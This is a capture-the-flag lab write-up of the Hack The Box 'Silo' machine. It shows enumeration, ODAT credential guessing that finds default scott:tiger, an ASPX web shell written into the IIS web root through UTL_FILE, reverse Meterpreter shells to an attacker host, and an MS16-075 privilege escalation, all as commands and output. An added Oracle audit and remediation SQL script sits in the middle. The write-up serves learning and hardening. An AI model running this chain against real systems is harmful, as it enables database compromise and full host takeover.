Silo

OS: Windows, Difficulty: Medium, IP: 10.10.10.82

Initial Enumeration

# Nmap 7.70 scan initiated Sun Jul 21 16:43:41 2019 as: nmap -sV -sC -O -A -p 80,135,139,445,1521,5985,47001 -oN O-detailed 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.28s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (94%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 7 Professional SP1 (93%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -6m45s, deviation: 0s, median: -6m45s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-07-21 16:37:20
|_  start_date: 2019-07-21 16:20:43

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   231.02 ms 10.10.14.1
2   265.03 ms 10.10.10.82

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 21 16:44:11 2019 -- 1 IP address (1 host up) scanned in 30.90 seconds

So there are 3 web servers, 3 SMB ports, and 1 Oracle port. I ran gobuster against all the web servers but found nothing, so I dropped that vector. On the SMB ports the guest account was disabled and I had no other credentials, so I dropped that too. The only port left was the Oracle port. I found CVE-2012-1675 and its exploit, but I was not able to exploit it; either the server was not vulnerable or I had something misconfigured, so the path beyond this was manual. However, I found an Oracle pentesting kit on GitHub (ODAT) which was useful throughout the whole operation.

Find all the valid database instances (SIDs) on this server.

./odat.py sidguesser -s 10.10.10.82 -p 1521

Found XE and a few others to be valid SIDs; however, I chose to focus on XE.

Check whether any default credentials work on this database.

./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/accounts_lower.txt

NOTE: I checked both uppercase and lowercase variations, as 11g stores case-sensitive passwords by default. Found scott:tiger to be a valid set of credentials.

The next task was to check whether this account is SYSDBA or SYSOPER on this database. I used Docker to run sqlplus and check this.

docker run -e URL="scott/tiger@//10.10.10.82:1521/XE as sysdba" -ti sflyr/sqlplus
docker run -e URL="scott/tiger@//10.10.10.82:1521/XE as sysoper" -ti sflyr/sqlplus

It turns out that the user we had was a SYSDBA. One of ODAT's modules lets us put a file on the server in a directory of our choosing. As there are web servers running, we can be fairly sure that the directory C:\Inetpub\wwwroot exists on the system, so I chose to upload my msfvenom ASPX shell there and get a reverse shell.

./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' shell.aspx ../shell.aspx --sysdba
[*] Started reverse TCP handler on 10.10.14.8:9999
msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.8:9999 -> 10.10.10.82:49166) at 2019-07-21 23:03:02 +0530

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : SILO
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_GB
Domain          : HTB
Logged On Users : 0
Meterpreter     : x64/windows
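The whole Oracle chain above (SID guessing, a default scott:tiger password, SYSDBA on a sample schema, and a UTL_FILE write into the IIS web root) rests on configuration a DBA can see from the catalog. The following audit script is an added example, not part of the original writeup or of ODAT; it is written for Oracle 11g (the listener version shown in the nmap output) and assumes it is run as SYS. The views and parameters used (DBA_USERS_WITH_DEFPWD, V$PWFILE_USERS, DBA_TAB_PRIVS, V$PARAMETER, DBA_DIRECTORIES, DBA_PROFILES) are real 11g catalog objects; "scott" is the account found above.

```sql
-- Added audit script (assumed to run as SYS on the 11g XE instance above).
-- Each block maps to one step the attacker chain depended on.

-- 1. Accounts still using a vendor default password. This is the list
--    ODAT's passwordguesser is effectively brute-forcing; anything open
--    here is a finding on its own.
SELECT d.username, u.account_status
  FROM dba_users_with_defpwd d
  JOIN dba_users u ON u.username = d.username
 WHERE u.account_status NOT LIKE 'LOCKED%'
 ORDER BY d.username;

-- 2. Accounts carrying SYSDBA/SYSOPER in the password file. A sample
--    schema such as SCOTT should never appear in this list.
SELECT username, sysdba, sysoper
  FROM v$pwfile_users
 ORDER BY username;

-- 3. Filesystem reach through UTL_FILE. UTL_FILE.FOPEN with a raw path
--    only works for paths listed in utl_file_dir (or '*'), and directory
--    objects are the other route; either one pointing at a web root
--    turns a database write into a web shell. sec_case_sensitive_logon
--    is included because the writeup relied on its default (TRUE) when
--    choosing which wordlist case to try.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE table_name = 'UTL_FILE';

SELECT name, value
  FROM v$parameter
 WHERE name IN ('utl_file_dir', 'sec_case_sensitive_logon');

SELECT owner, directory_name, directory_path
  FROM dba_directories
 ORDER BY directory_name;

-- 4. Lockout policy. A profile with FAILED_LOGIN_ATTEMPTS = UNLIMITED lets
--    passwordguesser walk the entire accounts file without tripping anything.
SELECT profile, limit
  FROM dba_profiles
 WHERE resource_name = 'FAILED_LOGIN_ATTEMPTS';

-- Remediation for what the queries above typically surface on this box:
ALTER USER scott ACCOUNT LOCK PASSWORD EXPIRE;
REVOKE SYSDBA FROM scott;
REVOKE EXECUTE ON utl_file FROM PUBLIC;
```

Note that a SYSDBA account bypasses object-level grants, so revoking EXECUTE on UTL_FILE from PUBLIC only closes the file-write path for ordinary users; the SYSDBA revoke and the account lock are what actually break the chain shown above. Failed logins against the listener also surface in the listener log and, with AUDIT SESSION enabled, in DBA_AUDIT_SESSION, which is where a wordlist run like passwordguesser would show up.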

User Own

c:\Users\Phineas\Desktop>type user.txt
type user.txt
92ede***

Root Own

msf5 exploit(multi/handler) > search local_exploit_suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          1                yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.82 - Collecting local exploits for x64/windows...
[*] 10.10.10.82 - 11 exploit checks are being tried...
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 832 launched.
[*] Reflectively injecting the exploit DLL into 832...
[*] Injecting exploit into 832...
[*] Exploit injected. Injecting exploit configuration into 832...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.82
[*] Meterpreter session 3 opened (10.10.14.8:4444 -> 10.10.10.82:49186) at 2019-07-21 23:08:45 +0530
C:\Users\Administrator\Desktop>type root.txt
type root.txt
cd39e***

Learning Outcome

Setting up MSF for Oracle pentesting sucks; ODAT was a real lifesaver. Oracle pentesting is real fun.
